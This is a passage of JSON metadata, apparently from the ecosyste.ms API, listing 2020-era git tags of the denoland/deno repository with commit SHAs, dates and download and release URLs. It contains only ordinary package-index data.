d_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:g